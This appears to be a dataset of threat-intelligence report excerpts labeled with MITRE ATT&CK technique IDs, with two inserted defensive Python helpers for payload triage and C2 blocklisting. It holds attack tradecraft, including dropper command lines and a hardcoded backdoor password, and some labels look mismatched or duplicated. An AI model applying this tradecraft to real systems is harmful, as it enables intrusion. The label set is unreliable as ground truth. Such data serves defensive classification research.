{"text1":"Use of trusted channels: BoomBox is a uniquely developed downloader used to obtain a later-stage payload from an actor-controlled Dropbox account. All initial communications leverage the Dropbox API via HTTPS. Opportunity for restraint: Consistent with other tools utilized by NOBELIUM, BoomBox, VaporRage, and some variants of NativeZone conduct some level of profiling on an affected system\u2019s environment. Ambiguity: VaporRage is a unique shellcode loader seen as the third-stage payload. VaporRage can download, decode, and execute an arbitrary payload fully in-memory. Such design and deployment patterns, which also include staging of payloads on a compromised website, hamper traditional artifacts and forensic investigations, allowing for unique payloads to remain undiscovered","labels":"['T1071.001']"}
|
|
{"text1":"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. The VBA functions trigger when the victim types any content into the maldoc. Appdata%\\desktop.ini. The next stage of the VBS is run using wscript.exe with a command such as: %windir%\\System32\\wscript.exe \/\/e:vbscript \/\/b <path_to_Stage_2>. Figure caption: Macros dropping VBS to disk and running it via wscript.exe","labels":"['T1204.002', 'T1059.005']"}
|
|
{"text1":"The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc","labels":"['T1140']"}
|
|
{"text1":"Using the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory","labels":"['T1140']"}
|
|
{"text1":"In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the developer wraps the malicious code with legitimate source code freely available online","labels":"['T1204.002']"}
|
|
{"text1":"This data is gathered into an information structure which the RAT zips with an 8-byte randomly generated password, which is then XORed with one byte","labels":"['T1560']"}
|
|
{"text1":"On another occasion, CVE-2021-26411 was used, which is another exploit targeting Internet Explorer and legacy versions of Microsoft Edge. The redirect code was set up in the same way as CVE-2020-1380, the only difference being the exploit code used. The key part of the exploit code used is given in Figures 3 and 4","labels":"['T1203']"}
|
|
{"text1":"The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data","labels":"['T1003.006']"}
|
|
{"text1":"TA416 has used SMTP2Go to impersonate various European diplomatic organizations since at least 2020. In this historical campaign, TA416 delivered a DropBox URL that delivered a PlugX variant aligning with Recorded Future\u2019s\u00a0analysis\u00a0of \"Red Delta\" PlugX malware. Included below is a publicly available malicious Zip file hash from August 2020 delivered via a DropBox URL which is attributable to TA416\/Red Delta","labels":"['T1102']"}
|
|
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are","labels":"['T1573.002']"}
|
|
{"text1":"The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads","labels":"['T1566.002']"}
|
|
{"text1":"In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of \u2018QQMgr.inf\u2019. Otherwise, it will use \u2018hccutils.inf\u2019 as an argument","labels":"['T1574.002']"}
|
|
{"text1":"Multiple samples contain UAC bypass code for both 32 and 64-bit systems. The UAC bypass code is stored as 'DAT' in the file's resource section","labels":"['T1548.002']"}
|
|
{"text1":"On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account","labels":"['T1204.002', 'T1566.001']"}
|
|
{"text1":"After successful lateral movement, the attackers tried to establish persistence on selected servers, targeting all domain controllers, but also other servers. To achieve persistence, they used WMI Event Subscription with a few different WMI objects","labels":"['T1546.003']"}
|
|
{"text1":"Figure 3 shows a code excerpt from the embedded macro that checks which\u00a0base64\u00a0blob should be decoded based on the\u00a0iCheck\u00a0variable, a\u00a0Boolean value\u00a0which is\u00a0set to true if the\u00a0victim system is running on a 64-bit system\u00a0and false on a 32-bit system. If the system is found to be 64-bit, the\u00a0base64\u00a0encoded blob on\u00a0the left\u00a0is decoded\u00a0otherwise\u00a0the\u00a0base64\u00a0encoded blob on\u00a0the right is decoded","labels":"['T1082']"}
|
|
{"text1":"The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack. Overall, SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system. These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection, as well as changes to the C2 communication mechanisms as explained in detail within the appendix. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and\/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload","labels":"['T1105']"}
|
|
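The certificate-armour trick in the record above works because `certutil -decode` strips the BEGIN/END CERTIFICATE lines and base64-decodes whatever sits between them, so an executable rides through a tool that is allow-listed as a certificate utility. The following is an added example, not code from the report or from Luckystrike: a Python helper that reproduces the decode step on a dropped .txt file and then checks whether the result is a real certificate (DER) or a PE, so such files can be triaged offline. The sample text and the fake PE header are constructed.

```python
"""Decode a certutil-style PEM-wrapped payload and check what it really is.

Added example, not from the original report. decode_pem_blob() does what
`certutil -decode` does to the dropped .txt file; classify() then looks at
the first bytes, because a genuine certificate is DER (ASN.1 SEQUENCE, 0x30),
not a PE ("MZ"). The sample inputs at the bottom are constructed.
"""
import base64
import re

PEM_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(?P<body>.*?)\s*-----END CERTIFICATE-----",
    re.S,
)


def decode_pem_blob(text: str) -> bytes:
    """Strip the certificate armour and base64-decode the body (line breaks allowed)."""
    m = PEM_RE.search(text)
    if not m:
        raise ValueError("no PEM armour found")
    body = re.sub(r"\s+", "", m.group("body"))
    return base64.b64decode(body, validate=True)


def classify(payload: bytes) -> str:
    """Rough type check on the decoded bytes."""
    if payload[:2] == b"MZ":
        return "pe"        # Windows executable hiding behind certificate armour
    if payload[:1] == b"\x30":
        return "der"       # ASN.1 SEQUENCE: plausibly a real certificate
    return "unknown"


def triage(text: str) -> dict:
    """Decode and classify one dropped file; 'pe' is the case the macro produces."""
    payload = decode_pem_blob(text)
    return {"kind": classify(payload), "size": len(payload)}


# Constructed sample: a minimal fake PE header wrapped exactly as the macro does it.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 16
SAMPLE_TXT = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.b64encode(FAKE_PE).decode()
    + "\n-----END CERTIFICATE-----\n"
)

# Constructed control: a bare ASN.1 SEQUENCE, i.e. what a real certificate starts with.
SAMPLE_DER_TXT = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.b64encode(b"\x30\x03\x02\x01\x01").decode()
    + "\n-----END CERTIFICATE-----\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE_TXT))
    print(triage(SAMPLE_DER_TXT))
```

In an investigation the same decode-then-classify step, applied to every .txt in C:\ProgramData that carries certificate armour, separates the dropped loader from legitimate certificate exports without relying on the random filename.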
{"text1":"As Hui explains, this happens because ngrok.io URLs stay online for only around 12 hours, and by the time security researchers identify a new C&C URL, the ngrok.io link changes to a new one, hiding the botnet from researchers once more. This allows the botnet to survive more than other botnets that host C&C servers on popular hosting platforms where security firms can usually intervene via abuse requests","labels":"['T1568.002']"}
|
|
{"text1":"As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples","labels":"['T1573.001']"}
|
|
{"text1":"If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function","labels":"['T1059.001', 'T1071.001']"}
|
|
{"text1":"It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot. Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsUpdate\\sibot, runs the following command-line daily","labels":"['T1112']"}
|
|
{"text1":"The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system","labels":"['T1210']"}
|
|
{"text1":"networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. It executes the following commands to gather information on the infected system","labels":"['T1016']"}
|
|
{"text1":"Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource","labels":"['T1059.005']"}
|
|
{"text1":"The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images","labels":"['T1119']"}
|
|
{"text1":"The official AutoIt3 interpreter comes as part of the AutoIt installation package, and it is used by the malware to execute the compiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, it loads the library, which was also passed as an argument to call a hardcoded exported function","labels":"['T1059.005']"}
|
|
{"text1":"1) Resolves WINAPI functions 2) Hides its GUI using the ShowWindow WINAPI call 3) Checks whether the DLL is being run by wmplayer","labels":"['T1564.003']"}
|
|
{"text1":"BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop","labels":"['T1102.001']"}
|
|
{"text1":"Throughout the years, Kimsuky has been using an array of malware in their operations. The infrastructure of some of the malware used by Kimsuky can be tracked using pattern analysis of the URI structures used by some of their tools. The following table maps commonly observed URI patterns to their respective malware","labels":"['T1566.001']"}
|
|
{"text1":"This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools","labels":"['T1140']"}
|
|
{"text1":"This appears to be an implementation of hashbusting \u2014 a method of obfuscation in which a malware sample is subtly changed on the fly so each sample has a different checksum. As a result, the SHA256 hash of each payload downloaded from the sites in question appeared to be unique. However, the SSDEEP fuzzy hash of this sample was as follows","labels":"['T1027.005']"}
|
|
{"text1":"By using these methods, Kimsuky can gain login and password information and\/or launch malware outside of some application allowlisting solutions","labels":"['T1133']"}
|
|
{"text1":"Once delivered, Egregor will perform a sequence of language checks\u00a0in a similar manner to both Maze and Sekhmet, before attempting to enumerate all connected drives. If successful, it connects to a command and control (C2) server to grab a list of directories\u00a0present on the enumerated drives to search. Any files in these directories are then extracted and sent back to the C2 server","labels":"['T1039']"}
|
|
{"text1":"After the driver is loaded, the VSS service is disabled using the Control Service Manager. Following this, a number of additional threads are created. A thread is created to handle the system reboot. It will sleep for the time specified by a command line parameter of 35 minutes, at which point the system will be restarted by an API call to InitializeSystemShutdownExW","labels":"['T1134']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018net time' command to check the local time on the target system. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1124']"}
|
|
{"text1":"The hooked WriteFile procedure\u2019s main purpose is to save the file handle of the subject file to write and install another hook in the CloseHandle API function","labels":"['T1005']"}
|
|
{"text1":"The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators","labels":"['T1587.001']"}
|
|
{"text1":"The first layer of the FYAnti loader decrypts an embedded .NET module and executes it using the CppHostCLR technique. The .NET module is packed using \u201cConfuserEx v1.0.0\u201d and acts as yet another loader that searches for a file in the \u201cC:\\Windows\\Microsoft.NET\\\u201d directory with file sizes between 100,000 and 500,000","labels":"['T1027.002', 'T1083']"}
|
|
{"text1":"Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. While GDPR requirements prevented us from pivoting on Registrant information, the actors reused IP space, reused a certificate, and the aforementioned domain mimicking technique allowed for some pivoting. Toolset . Once gaining a foothold on a user\u2019s system, the threat actors behind STOLEN PENCIL use Microsoft\u2019s Remote Desktop Protocol (RDP) for remote point-and-click access. This means a human is behind the keyboard interacting with a compromised system, and not using a RAT (Remote Access Trojan) with a command-and-control site acting as a proxy between the threat actor and the compromised system. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL: logs keystrokes to %userprofile%\\appdata\\roaming\\apach. - GREASE: a tool to add a Windows administrator account with a specific username\/password (defaultes\/1qaz2wsx#EDC) and enable RDP, circumventing any firewall rules. Figure 5: Certificate used to sign MECHANICAL\/GREASE. While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Using a combination of stolen passwords, backdoor accounts, and a forced-open RDP service, the threat actors are likely to retain a foothold on a compromised system. Conclusion . While we were able to gain insight into the threat actor\u2019s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity","labels":"['T1078.003']"}
|
|
{"text1":"This simple backdoor is likely used as a second-chance backdoor to maintain access to the system, even if the primary malware is removed. It could also be used as a second-stage dropper to infect the system with additional malware","labels":"['T1105']"}
|
|
{"text1":"Layer 2 uses a classic Adobe Flash Player Vector corruption technique to develop its heap corruption vulnerability to a full relative read\/write available to ActionScript3. In this technique, the attacker sprays Adobe Flash Player Vectors to the heap, and triggers a write vulnerability to change the size of one of the vectors. For more details on this technique, see Flash in 2015","labels":"['T1203']"}
|
|
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process","labels":"['T1059.001', 'T1489']"}
|
|
{"text1":"The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server","labels":"['T1105', 'T1059.003', 'T1071.004']"}
|
|
{"text1":"As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Check status, control, and end processes and services. Create, modify, and delete registry subkeys. Retrieve a list of logical drives","labels":"['T1083']"}
|
|
{"text1":"The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous","labels":"['T1090.002']"}
|
|
{"text1":"The malware component, test.exe, uses the Windows command \u201ccmd.exe \/C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task","labels":"['T1059.003', 'T1053.005', 'T1033']"}
|
|
{"text1":"The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not \u2018127.0.0.1\u2019. Both of these methods are also present in the latest Team9 backdoor variants","labels":"['T1008']"}
|
|
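The fallback C2 derivation in the record above is deterministic, so a defender who has the primary address can compute the backup address in advance instead of waiting for the primary to be taken down. The following is an added example, not the loader's own code: a Python function that applies the byte-wise XOR 0xFE transform and a second one that applies the loader's refusal to use 127.0.0.1 to both candidates, yielding the list of addresses the loader would actually try. The input addresses are constructed.

```python
"""Derive the Team9 loader's fallback C2 address from the primary one.

Added example (not the loader's own code). The report states that the backup
C2 IP is produced by XORing every byte of the resolved primary IP with 0xFE,
and that the loader refuses to use 127.0.0.1. Given a resolved primary this
yields the address that would otherwise only be seen when the primary fails,
so both can be blocked at once. Sample addresses below are constructed.
"""
import ipaddress

LOOPBACK = ipaddress.ip_address("127.0.0.1")


def alternate_c2(primary: str) -> str:
    """Apply the byte-wise XOR 0xFE transform described in the report.

    XOR is an involution, so alternate_c2(alternate_c2(x)) == x: the same
    function maps the backup address back to the primary.
    """
    packed = ipaddress.IPv4Address(primary).packed
    return str(ipaddress.IPv4Address(bytes(b ^ 0xFE for b in packed)))


def c2_candidates(primary: str) -> list[str]:
    """Primary plus derived fallback, minus anything the loader itself rejects.

    The loader's anti-sandbox check (resolved IP must not be 127.0.0.1) is
    applied to both candidates, so a sinkhole answering 127.0.0.1 yields only
    the derived address.
    """
    out = []
    for ip in (primary, alternate_c2(primary)):
        if ipaddress.ip_address(ip) == LOOPBACK:
            continue
        out.append(ip)
    return out


if __name__ == "__main__":
    # Constructed primary from the documentation range 203.0.113.0/24
    for ip in c2_candidates("203.0.113.10"):
        print(ip)
```

When feeding the result into a blocklist, keep in mind that the derived address is whatever the XOR produces and need not be routable or even in a sensible range; it is still worth recording because that is exactly what the loader will attempt.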
{"text1":"Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping","labels":"['T1133']"}
|
|
{"text1":"1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies","labels":"['T1559.002']"}
|
|
{"text1":"The main functionality of the macros remained the same as in a previous APT34 campaign: The malicious macros use the MouseAvailable function for evasion, and create a scheduled task to execute a payload embedded within the document","labels":"['T1053.005']"}
|
|
{"text1":"Since the 2016 publication, Microsoft has come across an evolution of PLATINUM\u2019s file-transfer tool, one that uses the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication","labels":"['T1105']"}
|
|
{"text1":"Maze creates a mutex with the name \u201cGlobal\\x\u201d, where x is a special value that is unique per machine. The next screenshot (with some information removed to anonymize the machine used for the analysis) shows an example of this behavior","labels":"['T1047']"}
|
|
{"text1":"Additionally, one of the samples is able to capture screenshots of the infected system. To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the keystrokes. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to know where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() APIs","labels":"['T1113']"}
|
|
{"text1":"Buckeye cyberespionage group shifts gaze from US to Hong Kong . Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization\u2019s network in 2009. Symantec has identified additional tools used by the group, which will be discussed later. Organizations that Buckeye targeted over time, per region . Malware and tools . Buckeye uses a number of hacking tools as well as malware. Buckeye uses Backdoor.Pirpi, a remote access Trojan capable of reading, writing, and executing files and programs. As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig\u201d. OSinfo: OSInfo is a general purpose, system information gathering tool. It has the following command line argument help: ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser. This, coupled with the group\u2019s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group","labels":"['T1059.003']"}
|
|
{"text1":"Just like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager and changed the execution flow of Telegram Desktop to ensure the persistence of their malware","labels":"['T1555.005']"}
|
|
{"text1":"In this campaign, Palmerworm is also using stolen code-signing certificates to sign its payloads, which makes the payloads appear more legitimate and therefore more difficult for security software to detect. Palmerworm has been publicly documented using stolen code-signing certificates in previous attack campaigns","labels":"['T1588.003']"}
|
|
{"text1":"After the malware is downloaded and the files verified, the script will check the C:\\Program Files\\ directory for the presence of Avast antivirus, which happens to be the most commonly installed AV worldwide","labels":"['T1518.001']"}
|
|
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies and event logs and trying to use PsExec & WMI to move further through the environment. This feature explains why we discovered several samples with different sets of credentials that were collected from previously infected systems. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives, so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4, which means: \"Disabled: Specifies that the service should not be started.\" Legitimate File . Additionally, Olympic Destroyer drops the legitimate, digitally signed PsExec file in order to perform lateral movement using this legitimate tool from Microsoft","labels":"['T1490']"}
|
|
{"text1":"To install a malicious shim database, the attacker invokes a Microsoft utility called sdbinst.exe through a PowerShell script","labels":"['T1059.001']"}
|
|
{"text1":"When connecting to web shells on a target network GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation","labels":"['T1583.004']"}
|
|
{"text1":"During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory listings, configuration files, manuals, email stores in the form of OST and PST files, file shares with intellectual property (IP), and data scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. Usually, however, the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive account controlled by the adversary","labels":"['T1114.001', 'T1083']"}
|
|
{"text1":"As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification","labels":"['T1132.001']"}
|
|
{"text1":"We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor","labels":"['T1036.005']"}
|
|
{"text1":"1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start\/stop the mining based on CPU usage and whether the Activity Monitor process is running","labels":"['T1059.004']"}
|
|
{"text1":"Retefe is different from most banking Trojans, which typically attack web browser software to capture login credentials before they are encrypted with SSL and sent to the bank\u2019s web server. Instead, Retefe uses the Windows PowerShell to execute a series of commands that installs a new root certificate on the system and a proxy configuration to re-route the traffic to the targeted banking websites","labels":"['T1553.004']"}
|
|
{"text1":"Remote desktop available via VNC. Hidden remote desktop available via RDPWrap. Privilege escalation (even for the latest Win10 updates). Remote WebCam control. Remote Shell","labels":"['T1021.005']"}
|
|
{"text1":"The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process","labels":"['T1070.001']"}
|
|
{"text1":"The tool is used to hide the threat actors\u2019 tools and services. The tool\u2019s configuration was added to registry run keys on a victim\u2019s computer","labels":"['T1547.001', 'T1112']"}
|
|
{"text1":"When loaded with startup command 2, the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll. In this case the persistence is achieved by loading the original explorer.exe from its startup location and, using DLL side-loading, passing the execution control to the stage 4 malware (discussed in next section","labels":"['T1036.005']"}
|
|
{"text1":"After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc","labels":"['T1082']"}
|
|
{"text1":"Backdating, or timestomping, is a technique used by many threat actors which involves the manipulation of the creation timestamps or compilation date of a file in order to thwart analysis attempts (anti-forensics). It is suspected that the creation date of most of the files mentioned in this report were tampered with by the threat actors and backdated to 2016","labels":"['T1070.006']"}
|
|
{"text1":"KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine\u2019s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms","labels":"['T1083']"}
|
|
{"text1":"RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. Usage is: %s shareIp domain [USER INFORMATION||[USER NAME AND PASSWORD]] [\/run:[COMMAND","labels":"['T1569.002', 'T1053.005']"}
|
|
{"text1":"The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase","labels":"['T1569.002']"}
|
|
{"text1":"Typical file exfiltration modules deployed by threat actors usually consist of the ability to enumerate and exfiltrate files. These implants enumerate files in specific drives or directories and exfiltrate the file lists first. Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files. The VBScript-based file recon module used by the attackers is somewhat different. It downloads a file listing from a remote location that contains the file paths of specific files of interest to the attackers. The file listing is so precise that the attackers know the exact file paths of the files they're looking for on an infected endpoint. This prevents re-infection of the target. A marker file is created in an attacker-specified folder and is checked before the exfiltration module begins its malicious activities. If the marker file is not found, the module will proceed with its recon and exfiltration activities. In August 2021, we saw a minor variation of the same script being deployed in the wild. Instead, it's hardcoded into the scripts showing that the attackers already know the identities of the targets that they are trying to infect. This indicates that this is a highly targeted attack. In October 2021, we observed another update in the file exfiltration scripts","labels":"['T1083']"}
|
|
{"text1":"After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks","labels":"['T1105']"}
|
|
